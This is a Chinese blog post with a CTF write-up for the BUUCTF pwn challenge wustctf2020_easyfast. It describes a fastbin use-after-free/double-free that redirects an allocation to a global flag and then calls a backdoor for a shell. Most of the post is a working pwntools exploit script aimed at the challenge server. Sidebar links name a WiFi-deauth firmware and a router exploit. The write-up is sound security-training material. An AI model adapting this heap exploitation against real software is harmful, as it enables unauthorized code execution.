[BUUCTF]pwn - wustctf2020_easyfast (Use After Free)

最新推荐文章于 2024-02-06 21:27:21 发布
最新推荐文章于 2024-02-06 21:27:21 发布
阅读量415 收藏
点赞数 2
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/117780590
版权

在这里插入图片描述打开菜单,了解到相应的功能后,改一下名字

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这个漏洞大致利用方式是这样的;

在这里插入图片描述

利用思路

通过double free修改chunk0的fd指针,让申请到的chunk能够覆盖到0x602090,修改1为0,最后直接调用backdoor来getshell

from pwn import *

#p=process('./wustctf2020_easyfast')

p=remote("node3.buuoj.cn",25044)

context.log_level="debug"

def add(size):
	p.recvuntil('choice>')

	p.sendline('1')

	p.recvuntil('size>')

	p.sendline(str(size))

	



def delete(index):

	p.recvuntil('choice>')

	p.sendline('2')

	p.recvuntil('index>')

	p.sendline(str(index))



def edit(idx,content):

	p.sendlineafter('choice>','3')

	p.sendlineafter('index>',str(idx))

	p.send(content)



def backdoor():

	p.sendlineafter('choice>','4')
add(0x40)#0
add(0x40)#1
delete(0)
edit(0,p64(0x602080))
add(0x40)#0
add(0x40)#3
edit(3,p64(0))
backdoor()
#gdb.attach(p)
p.interactive()
半岛铁盒@
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4314
BUUCTF刷题记录
pwn入门小技巧
qq_36918532的博客
05-24 2739
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
wustctf2020_easyfast
m0_73756460的博客
03-12 119
buu刷题wustctf2020_easyfast 【write up】
wustctf2020_easyfast(uaf)
m0_51251108的博客
11-05 540
wustctf2020_easyfast: 逆向分析: 主界面: add函数: free函数: edit函数: backdoor: 这题是libc2.23的doublefree,注意区别 引用这位师傅的回顾double free手法 在glibc2.27之前,主要是fastbin double freefastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,
[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)
最新发布
2301_79326813的博客
02-06 297
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
wustctf 2020 easyfast 做题笔记
fa1c4的blog
09-06 347
前言 一道fastbin attack (fastbin double free/ 其实BUU这题是UAF) 的题目 BUU有环境 分析过程 分析之后重命名各个函数 void sub_400ACD() { char s[8]; // [rsp+0h] [rbp-20h] BYREF __int64 v1; // [rsp+8h] [rbp-18h] unsigned __int64 v2; // [rsp+18h] [rbp-8h] v2 = __readfsqword(0x28u);
堆入门之常见漏洞利用
蚁景网安学院
04-17 1087
本文结合具体的题目,对基于堆的常见漏洞利用方式,包括泄露libc基地址的常见方式、Use After Freefastbin attack、Unlink和Off By One进行了梳理...
pwn 堆入门之use after free
清霂的博客
04-11 149
目录hacknote hacknote #!/usr/bin/env python2 from pwn import * arch = "i386" filename = "hacknote" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc def add(i,size,content): io.sendline('1')
堆利用 - Use After Free
yms0211的博客
03-22 1084
堆利用 - Use After Free 概述: Use after free ,直译过来就是在释放后再利用,那么是怎么在释放后再利用的呢? 其实这个释放后再利用主要是因为在程序中原本指向某些函数或堆块的指针在堆块被free或函数结束后指针本身确没有被置空,那么这个没有被置空的指针所在的堆块虽然被释放了,但是我们却还可以通过程序内对堆块内部的操作来执行这个指针指向的函数。 #以下的内容截取自CTF-wiki# 堆块被释放后一般有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后
pwnuse_after_free
Maxmalloc的博客
12-08 533
题目链接 先贴出源代码 add_note notelist[i] = malloc(8u); ... *(_DWORD *)notelist[i] = print_note_content; printf("Note size :"); read(0, &buf, 8u); size = atoi(&am...
WUST-CTF2020-WP
夏日 の blog
03-29 5320
目录WEBcheckinadminCV Makereasywebtrain yourself to be godlyMISCSpace ClubWelcomeAlison likes jojoShopgirlfriend小结 WEB checkin 打开页面显示Who’s the author?,回到题目发现作者是52HeRtz,输入52HeRtz发现有截断,f12选中输入框把maxlength改...
[WUSTCTF2020]朴实无华
SopRomeo的博客
05-20 1476
没啥提示,扫下目录 dirsearch 扫到robots.txt 进去看看 访问这个假的flag 扫不到其他东西了,抓个包看看 藏在这里头去了 看看代码 Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/fl4g.php:2) in /var/www/html/fl4g.php on line 3 <img src="/img.jpg"&g.
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值